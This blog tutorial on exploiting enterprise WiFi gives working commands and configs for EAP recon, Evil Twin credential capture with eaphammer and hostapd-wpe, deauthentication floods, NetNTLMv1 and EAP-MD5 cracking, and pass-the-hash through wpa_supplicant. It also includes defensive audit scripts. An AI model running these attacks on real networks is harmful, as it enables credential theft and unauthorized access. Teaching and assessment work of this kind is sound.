WiFi Hacking 101: Exploiting Enterprise Networks (Part 3)


February 22, 2026


👋 Introduction

Hey everyone!

We’re continuing the WiFi series this week, moving into enterprise network exploitation. This is Part 3, based on the WiFi security course I took last month with @OscarAkaElvis (creator of airgeddon).

Parts 1 and 2 covered the fundamentals: hardware setup, monitor mode, WPA/WPA2 cracking, PMKID attacks, WPS exploitation, and WPA3 vulnerabilities. That’s the home network and small business landscape.

Enterprise WiFi is different. 802.1X authentication with RADIUS servers. Individual user credentials instead of shared passwords. EAP methods like PEAP, TTLS, and TLS. Certificate-based mutual authentication.

On paper, it’s significantly more secure than WPA2-PSK. In practice, it’s consistently misconfigured.

The problem is compatibility. Organizations deploy PEAP+MSCHAPv2 (which leaks NetNTLMv1 hashes ready for offline cracking) because it works with Windows without additional configuration. They enable legacy authentication methods like PAP and EAP-MD5 for backwards compatibility with ancient devices. They skip certificate validation on client devices to avoid support tickets.

Every one of these decisions creates an attack vector.

This week we’re covering the fundamentals of enterprise WiFi exploitation: 802.1X architecture, EAP authentication methods, reconnaissance techniques, credential capture attacks with Evil Twin, legacy method exploitation, and Pass-the-Hash.

Part 4 (next week) will cover the advanced techniques: PEAP relay attacks, ESSID stripping for WIDS bypass, and comprehensive defensive mitigations.

Let’s exploit some enterprise WiFi 👇

🏢 Enterprise WiFi Architecture

Enterprise WiFi uses 802.1X (IEEE standard from 2001) for network access control. Instead of a shared password like WPA2-PSK, each user authenticates with individual credentials verified against a backend RADIUS server.

Key components:

Supplicant - The client device (laptop, phone) trying to connect. Runs wpa_supplicant or Windows supplicant.

Authenticator - The access point. Doesn’t make auth decisions, just forwards EAP frames between supplicant and RADIUS server.

Authentication Server - RADIUS server integrated with Active Directory or LDAP. Makes the accept/reject decision.

Authentication flow:

1. Client sends EAPOL-Start to AP
2. AP forwards EAP-Identity-Request to client
3. Client responds with identity ([email protected])
4. AP forwards to RADIUS server
5. RADIUS server initiates EAP method (PEAP, TTLS, TLS)
6. Client and RADIUS establish TLS tunnel
7. Inner authentication happens inside tunnel (MSCHAPv2, GTC, etc)
8. RADIUS sends Access-Accept or Access-Reject to AP
9. AP grants or denies network access

This architecture has a fundamental flaw: the access point blindly forwards EAP frames. It doesn’t validate that the RADIUS server is legitimate. This enables Evil Twin attacks where an attacker presents a fake AP, and if clients don’t enforce certificate validation, they connect automatically and leak credentials.

🔐 EAP Authentication Methods

EAP (Extensible Authentication Protocol, RFC 3748) supports multiple authentication mechanisms. Each has different security properties and attack surfaces.

PEAP (Protected EAP)

Most common in corporate environments. Establishes a TLS tunnel between client and RADIUS server, then performs inner authentication inside the tunnel.

PEAP+MSCHAPv2 is the standard configuration. Client sends username/password. Server responds with challenge. Client computes response using NT hash of password. This challenge/response is NetNTLMv1, which can be captured and cracked offline.

The TLS tunnel protects credentials from passive eavesdropping but does nothing against active Evil Twin attacks if the client doesn’t validate the server certificate.

EAP-TTLS (Tunneled TLS)

Similar to PEAP but more flexible. Supports more inner authentication methods including PAP (plaintext passwords inside tunnel), CHAP, MSCHAPv2, and EAP-based methods.

EAP-TTLS+PAP is dangerously common. Organizations deploy it for legacy device compatibility. If you can get a client to connect to your fake AP, you capture plaintext credentials.

EAP-TLS

The most secure option. Mutual certificate-based authentication. Both client and server present certificates. No passwords transmitted.

If an enterprise network uses EAP-TLS exclusively with proper certificate validation, you’re not capturing credentials through Evil Twin attacks. You’ll need to pivot to other vectors (physical access to extract client certs, social engineering, etc).

Legacy Methods

PAP (Password Authentication Protocol) - Transmits passwords in cleartext. Only acceptable inside a TLS tunnel (TTLS+PAP). If deployed without tunneling, credentials are immediately compromised.

CHAP (Challenge-Handshake Authentication Protocol) - Uses MD5 challenge/response. Weak cryptography, vulnerable to offline cracking.

EAP-MD5 - Legacy EAP method with simple MD5 challenge/response. No mutual authentication. No session key derivation. Completely broken. Credentials can be captured and cracked offline.

If you discover PAP, CHAP, or EAP-MD5 enabled on an enterprise network, that’s a critical finding.

🔍 Reconnaissance Phase

Before attacking, understand the target network’s configuration.

Capture EAP Identities

User identities are transmitted during EAP authentication. These follow specific formats:

# Start capture on target network
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

Analyze with Wireshark:

eap && eap.identity

You’ll see identity formats and potentially extract valid usernames for further attacks.

Extract AP Certificate

The RADIUS server presents a certificate during TLS tunnel establishment (the access point only relays it to the client). You need the certificate details to create a convincing fake AP.

Wireshark filter:

eap && tls.handshake.certificate

Look for:

  • Subject: Server hostname
  • Issuer: Certificate Authority
  • Validity period
  • Subject Alternative Names (SANs)

The more closely your fake certificate resembles the legitimate one, the more likely clients will connect automatically (if they’re not enforcing CA validation, which many aren’t).

Detect Supported EAP Methods

Once you have a valid username, test which EAP methods the RADIUS server supports.

EAP_buster tool:

# Clone
git clone https://github.com/blackarrowsec/EAP_buster
cd EAP_buster

# Test methods (adapter in managed mode)
# Arguments: target ESSID, a valid identity from recon, wireless interface
# (identity below is a placeholder; use one captured during recon)
bash ./EAP_buster.sh 'CorporateWiFi' 'user@corp.example' 'wlan0'

This probes the RADIUS server with different EAP method requests. Output shows which methods are accepted (PEAP, TTLS, TLS, MD5, etc).

If you see PAP, CHAP, or EAP-MD5 accepted, prioritize those for credential capture.
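Both recon steps above (reading outer identities and learning which EAP methods the server offers) can be done directly from the EAP packets rather than by eye in Wireshark. The Python below is an added example written for this article, not code from EAP_buster or any other tool on this page: it parses EAPOL/EAP frames, records which method types the server requests, and flags the two things a defender should fix, a real username in the outer identity and any untunnelled legacy method. The exchange it runs over is constructed inline, not a real capture.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

# EAP codes and method types (RFC 3748 and the IANA EAP registry)
EAP_CODES = {1: "Request", 2: "Response", 3: "Success", 4: "Failure"}
EAP_TYPES = {1: "Identity", 2: "Notification", 3: "Nak", 4: "MD5-Challenge",
             6: "GTC", 13: "TLS", 17: "LEAP", 21: "TTLS", 25: "PEAP", 43: "FAST"}
# Methods with no TLS tunnel: the challenge/response is visible on the air
LEGACY_TYPES = {4, 17}


@dataclass
class EapPacket:
    code: str
    identifier: int
    eap_type: Optional[int]   # None for Success/Failure
    type_name: str
    data: bytes               # Type-Data: identity string, challenge, flags...


def parse_eapol_eap(frame: bytes) -> EapPacket:
    """Parse an EAPOL frame (802.1X header) carrying an EAP packet."""
    if len(frame) < 4:
        raise ValueError("truncated EAPOL header")
    _version, eapol_type, body_len = struct.unpack("!BBH", frame[:4])
    if eapol_type != 0:                      # 0 = EAP-Packet; 1 = EAPOL-Start, 3 = EAPOL-Key
        raise ValueError(f"EAPOL type {eapol_type} does not carry EAP")
    body = frame[4:4 + body_len]
    if len(body) < 4:
        raise ValueError("truncated EAP header")
    code, identifier, length = struct.unpack("!BBH", body[:4])
    if length < 4 or length > len(body):
        raise ValueError("EAP length field does not match frame")
    payload = body[4:length]
    code_name = EAP_CODES.get(code, f"code-{code}")
    if code in (3, 4) or not payload:        # Success/Failure carry no Type field
        return EapPacket(code_name, identifier, None, "", b"")
    eap_type = payload[0]
    return EapPacket(code_name, identifier, eap_type,
                     EAP_TYPES.get(eap_type, f"type-{eap_type}"), payload[1:])


def build_eapol_eap(code: int, identifier: int, eap_type: Optional[int] = None,
                    data: bytes = b"") -> bytes:
    """Build an EAPOL/EAP frame; used here only to construct sample traffic."""
    body = (bytes([eap_type]) + data) if eap_type is not None else b""
    eap = struct.pack("!BBH", code, identifier, 4 + len(body)) + body
    return struct.pack("!BBH", 1, 0, len(eap)) + eap


# Constructed sample exchange (not a real capture): the AP asks for an identity,
# the client answers with its real username, the server offers PEAP, the client
# Naks it asking for MD5-Challenge, and the server obliges.
SAMPLE_EXCHANGE: List[bytes] = [
    build_eapol_eap(1, 1, 1),
    build_eapol_eap(2, 1, 1, b"jsmith@corp.example"),
    build_eapol_eap(1, 2, 25, b"\x20"),                        # PEAP, Start flag set
    build_eapol_eap(2, 2, 3, bytes([4])),                      # Nak: client wants type 4
    build_eapol_eap(1, 3, 4, bytes([16]) + bytes(range(16))),  # MD5-Challenge, 16-byte value
]


def audit_exchange(frames: List[bytes]) -> Tuple[List[str], List[str]]:
    """Return (EAP methods the server requested, findings worth reporting)."""
    methods = set()
    findings: List[str] = []
    for frame in frames:
        pkt = parse_eapol_eap(frame)
        if pkt.code == "Response" and pkt.eap_type == 1:
            identity = pkt.data.decode("utf-8", "replace")
            if not identity.lower().startswith("anonymous"):
                findings.append(f"outer identity sent in the clear: {identity}")
        if pkt.code == "Request" and pkt.eap_type is not None and pkt.eap_type >= 4:
            methods.add(pkt.type_name)
            if pkt.eap_type in LEGACY_TYPES:
                findings.append(f"legacy EAP method negotiated: {pkt.type_name}")
    return sorted(methods), findings


if __name__ == "__main__":
    offered, notes = audit_exchange(SAMPLE_EXCHANGE)
    print("methods requested by server:", ", ".join(offered))
    for note in notes:
        print("finding:", note)
```

Feed it the EAPOL payloads of 802.1X frames from a pcap and the findings list doubles as an assessment note: an anonymous outer identity and only PEAP/TTLS/TLS requests is what a hardened deployment looks like.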

💀 Attack 1: Credential Capture with Evil Twin

The most practical enterprise WiFi attack. Set up a fake access point that mimics the legitimate network. When clients connect, capture authentication credentials.

Prerequisites:

  • Valid SSID
  • Target channel
  • Certificate details (from recon phase)
  • Tool: hostapd-wpe or eaphammer

Using eaphammer

eaphammer automates the entire attack workflow.

Step 1: Create certificates

# Clone and setup
git clone https://github.com/s0lst1c3/eaphammer
cd eaphammer

# Certificate wizard
python3 ./eaphammer --cert-wizard

Answer prompts with details extracted from legitimate AP certificate. The closer the match, the better.

Step 2: Launch Evil Twin

# Adapter must be in managed mode
# eaphammer will switch it to master mode automatically

python3 ./eaphammer -i wlan0 \
  --auth wpa-eap \
  --essid 'CorporateWiFi' \
  --creds

This creates a fake AP with SSID “CorporateWiFi” and starts capturing credentials.

Step 3: Deauth legitimate clients (on second adapter)

# On second adapter in monitor mode
# Tune to target channel
sudo iw dev wlan1mon set channel 6

# Deauth attack
sudo aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF --ignore-negative-one wlan1mon

Clients disconnect from real AP and reconnect. If their configuration doesn’t enforce proper certificate validation, they connect to your fake AP automatically.

Step 4: Captured credentials

eaphammer outputs captured hashes in real-time:

[CREDS] username: [email protected]
[CREDS] NetNTLMv1 Challenge: 5c2b6f3a7d8e9f1c
[CREDS] NetNTLMv1 Response: a7d8e9f1c2b3a4f5...

These NetNTLMv1 hashes can be cracked offline with Hashcat or John the Ripper.
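Whether the deauth-and-reconnect step yields anything depends entirely on the client profile. As an added check (example code written for this article, not eaphammer's or hostapd-wpe's), the Python below parses wpa_supplicant network blocks and flags the settings that make a client accept an Evil Twin: no pinned CA, no server-name match, no anonymous outer identity, or a cleartext inner method. Both configurations, the SSID, identity, password, certificate path and RADIUS hostname are constructed for the example.

```python
import re
from typing import Dict, List

# A client profile with no server validation at all (constructed example).
WEAK_CONF = '''
network={
    ssid="CorporateWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jsmith@corp.example"
    password="Summer2024!"
    phase1="peapver=0"
    phase2="auth=MSCHAPV2"
}
'''

# Same network, hardened: CA pinned, server name checked, username hidden.
HARDENED_CONF = '''
network={
    ssid="CorporateWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    anonymous_identity="anonymous@corp.example"
    identity="jsmith@corp.example"
    password="Summer2024!"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"   # hypothetical path
    domain_match="radius.corp.example"            # hypothetical RADIUS server name
    phase1="peapver=0"
    phase2="auth=MSCHAPV2"
}
'''


def parse_network_blocks(conf: str) -> List[Dict[str, str]]:
    """Extract network={...} blocks into dicts (quotes stripped, comments dropped)."""
    blocks = []
    for body in re.findall(r"network=\{(.*?)\}", conf, re.S):
        entry: Dict[str, str] = {}
        for raw in body.splitlines():
            line = raw.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, value = (s.strip() for s in line.split("=", 1))
            if value.startswith('"'):
                value = value[1:value.find('"', 1)]      # quoted: keep up to closing quote
            else:
                value = value.split("#", 1)[0].strip()   # unquoted: drop trailing comment
            entry[key] = value
        blocks.append(entry)
    return blocks


def audit_network(net: Dict[str, str]) -> List[str]:
    """Report settings that let a client accept an Evil Twin or leak credentials."""
    findings: List[str] = []
    if "WPA-EAP" not in net.get("key_mgmt", "").upper():
        return findings                      # not an 802.1X network, nothing to check
    eap = net.get("eap", "").upper()
    if eap in ("MD5", "LEAP"):
        findings.append(f"eap={eap}: untunnelled method, challenge/response crackable offline")
    if eap in ("PEAP", "TTLS", "TLS"):
        if not (net.get("ca_cert") or net.get("ca_path")):
            findings.append("no ca_cert/ca_path: any server certificate is accepted")
        if not (net.get("domain_match") or net.get("domain_suffix_match")
                or net.get("altsubject_match")):
            findings.append("no domain_match/domain_suffix_match: any cert from the CA is accepted")
    if not net.get("anonymous_identity"):
        findings.append("no anonymous_identity: real username travels in the clear")
    phase2 = net.get("phase2", "").lower()
    if "auth=pap" in phase2 or "auth=chap" in phase2:
        findings.append(f'phase2="{phase2}": password exposed to whoever terminates the tunnel')
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        for net in parse_network_blocks(conf):
            print(f"[{label}] {net.get('ssid')}: {audit_network(net) or ['ok']}")
```

The same checks map onto Windows and mobile profiles: the supplicant must know which CA signed the RADIUS certificate and which server name to expect, or the certificate wizard output in Step 1 is all it ever compares against.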

Using hostapd-wpe

hostapd-wpe is the alternative. More manual but works reliably.

Configuration file (hostapd-wpe.conf):

interface=wlan0
driver=nl80211
ssid=CorporateWiFi
channel=6
hw_mode=g

wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
auth_algs=3

ieee8021x=1
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/etc/hostapd-wpe/certs/ca.pem
server_cert=/etc/hostapd-wpe/certs/server.pem
private_key=/etc/hostapd-wpe/certs/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/certs/dh

EAP user file (hostapd.eap_user):

*     PEAP,TTLS,TLS,FAST
"t"   TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC   "t"   [2]

This accepts any username and enables all methods.

Launch:

sudo hostapd-wpe hostapd-wpe.conf

Captured hashes are logged to console and hostapd-wpe.log.

Cracking NetNTLMv1 Hashes

Hashcat (GPU-accelerated):

# Hashcat mode 5500 for NetNTLMv1
hashcat -m 5500 -a 0 hashes.txt wordlist.txt

# With rules for better coverage
hashcat -m 5500 -a 0 hashes.txt wordlist.txt -r rules/best64.rule

John the Ripper:

john --format=netntlm-naive --wordlist=wordlist.txt hashes.txt

NetNTLMv1 is significantly faster to crack than NetNTLMv2. Weak passwords fall within minutes.

🔓 Attack 2: Legacy Method Exploitation

If the network supports PAP, CHAP, or EAP-MD5, exploitation is straightforward.

EAP-MD5 Credential Capture

EAP-MD5 uses simple MD5 challenge/response without tunneling. Capture the exchange and crack offline.

Capture with Wireshark:

eap && eap.type == 4

Extract:

  • Identity (username)
  • Challenge (MD5 challenge value)
  • Response (MD5 response value)

Example from pcap:

Identity: jsmith
Challenge (hex): 5c2b6f3a7d8e9f1c2a3b4c5d6e7f8091
Response (hex): a7d8e9f1c2b3a4f5c6d7e8f90a1b2c3d

Cracking EAP-MD5 with eapmd5pass

# Format challenge and response with colons
CHALLENGE=$(echo "5c2b6f3a7d8e9f1c2a3b4c5d6e7f8091" | sed 's/\(..\)/\1:/g;s/:$//')
RESPONSE=$(echo "a7d8e9f1c2b3a4f5c6d7e8f90a1b2c3d" | sed 's/\(..\)/\1:/g;s/:$//')

# Crack with dictionary
# -U is the username; -E is the one-byte EAP Identifier from the captured
# Request/Response pair, which is part of the hashed input (value not shown in the pcap excerpt above)
eapmd5pass -w wordlist.txt -U jsmith -E <eap-id> -C "$CHALLENGE" -R "$RESPONSE"

Alternative: hcxpcapngtool + Hashcat

# Convert capture to Hashcat format
hcxpcapngtool --eapmd5=eapmd5.hash capture.cap

# Crack with Hashcat mode 4800
hashcat -m 4800 -a 0 eapmd5.hash wordlist.txt
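Why capture-and-crack works for EAP-MD5 comes down to one line of arithmetic. The Python below is an added example written for this article (not eapmd5pass or hashcat code): it implements the response computation from RFC 3748 section 5.4, which reuses the CHAP construction of RFC 1994, together with the server-side check. The identifier, challenge and password are constructed. It also shows why the EAP Identifier byte has to be supplied alongside challenge and response, and that the server must hold the cleartext secret to verify anything at all.

```python
import hashlib
import hmac


def eap_md5_response(identifier: int, secret: str, challenge: bytes) -> bytes:
    """EAP-MD5 Response value: MD5(Identifier || secret || Challenge).
    No salt, no key derivation, and the server needs the cleartext secret."""
    if not 0 <= identifier <= 255:
        raise ValueError("EAP Identifier is a single byte")
    return hashlib.md5(bytes([identifier]) + secret.encode("utf-8") + challenge).digest()


def verify_eap_md5(identifier: int, challenge: bytes, response: bytes, secret: str) -> bool:
    """The authentication server's check. Anyone holding the three captured
    values can run exactly the same check, one MD5 per candidate password."""
    expected = eap_md5_response(identifier, secret, challenge)
    return hmac.compare_digest(expected, response)


def colon_hex(data: bytes) -> str:
    """aa:bb:cc form, the same transformation as the sed one-liner above."""
    return ":".join(f"{b:02x}" for b in data)


# Constructed exchange (not from a capture): EAP Identifier 3, a 16-byte
# challenge, and the response a client with password "Summer2024!" would send.
EXAMPLE_ID = 3
EXAMPLE_CHALLENGE = bytes.fromhex("5c2b6f3a7d8e9f1c2a3b4c5d6e7f8091")
EXAMPLE_RESPONSE = eap_md5_response(EXAMPLE_ID, "Summer2024!", EXAMPLE_CHALLENGE)


if __name__ == "__main__":
    print("challenge:", colon_hex(EXAMPLE_CHALLENGE))
    print("response: ", colon_hex(EXAMPLE_RESPONSE))
    print("correct secret, right id:",
          verify_eap_md5(EXAMPLE_ID, EXAMPLE_CHALLENGE, EXAMPLE_RESPONSE, "Summer2024!"))
    # Same secret, wrong Identifier: the check fails. That is why the EAP ID must
    # be recorded from the capture along with the challenge and response.
    print("correct secret, wrong id:",
          verify_eap_md5(EXAMPLE_ID + 1, EXAMPLE_CHALLENGE, EXAMPLE_RESPONSE, "Summer2024!"))
```

The defensive reading: there is nothing to tune here, no salt, no iteration count, no session key. A RADIUS server that offers EAP-MD5 also has to keep reversible or cleartext passwords, so disabling the method is the only fix.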

TTLS+PAP Plaintext Capture

If the network supports TTLS+PAP and clients don’t validate server certificates, you capture plaintext passwords.

eaphammer captures automatically:

python3 ./eaphammer -i wlan0 --auth wpa-eap --essid 'CorporateWiFi' --creds

When a client connects using TTLS+PAP, eaphammer logs:

[CREDS] username: [email protected]
[CREDS] password: Summer2024!

No cracking needed. Direct cleartext credentials.

🔑 Pass-the-Hash in Enterprise WiFi

Once you’ve captured a user’s hash, you can authenticate with the NT hash directly instead of cracking the plaintext password: as noted in the PEAP section, the MSCHAPv2 response is computed from the NT hash of the password, never from the password itself.

wpa_supplicant supports NT hash authentication:

# Generate NT hash from password (for testing): MD4 over the UTF-16LE encoding.
# OpenSSL 3 keeps MD4 in the legacy provider; load the default provider too so dgst still works.
# The hash below is the well-known NT hash of the word "password".
echo -n "password" | iconv -t UTF-16LE | openssl dgst -md4 -provider legacy -provider default

Output: 8846f7eaee8fb117ad06bdd830b7586c

Configuration file:

network={
    ssid="CorporateWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="[email protected]"
    # NT hash in place of the plaintext password
    password=hash:8846f7eaee8fb117ad06bdd830b7586c
    phase1="peapver=0"
    phase2="auth=MSCHAPV2"
}

Connect:

wpa_supplicant -D nl80211 -i wlan0 -c corp.conf

You’re authenticated using the hash. No need to crack the plaintext password.

This is particularly useful when you’ve captured hashes but cracking is taking too long. Authenticate immediately with the hash.

🎯 Key Takeaways

Enterprise WiFi security depends entirely on proper configuration. 802.1X with RADIUS provides strong authentication architecture, but organizations consistently misconfigure it.

The most common failure is not enforcing certificate validation on clients. This single misconfiguration enables all Evil Twin attacks. Clients connect to fake access points automatically, leaking credentials.

PEAP+MSCHAPv2 is the most deployed enterprise method and remains vulnerable to credential capture. NetNTLMv1 hashes can be cracked offline or used directly via Pass-the-Hash.

Legacy methods (PAP, CHAP, EAP-MD5) should never be deployed. If you find them during an assessment, that’s a critical finding. Credentials are either plaintext or trivially crackable.

Reconnaissance is essential. Extract EAP identities to understand username formats. Capture AP certificates to create convincing fake APs. Test supported EAP methods with EAP_buster to identify the weakest path.

eaphammer and hostapd-wpe are your primary tools. Both capture credentials automatically. eaphammer is more automated, hostapd-wpe gives you more control.

Pass-the-Hash works in enterprise WiFi. You don’t always need to crack captured hashes. Use them directly in wpa_supplicant configuration.


That’s it for Part 3!

We’ve covered the fundamentals of enterprise WiFi exploitation: architecture, authentication methods, reconnaissance, credential capture, legacy method attacks, and Pass-the-Hash.

Part 4 (next week) will dive into advanced techniques: PEAP relay attacks (real-time credential relaying without cracking), ESSID stripping for WIDS bypass, comprehensive defensive mitigations, and practice lab setup.

These attacks work because organizations prioritize compatibility and ease of deployment over security. Test them on your own lab first. Set up a Raspberry Pi with FreeRADIUS and hostapd. Practice the techniques until you understand the 802.1X flow completely.

Thanks for reading, and happy hunting!

— Ruben
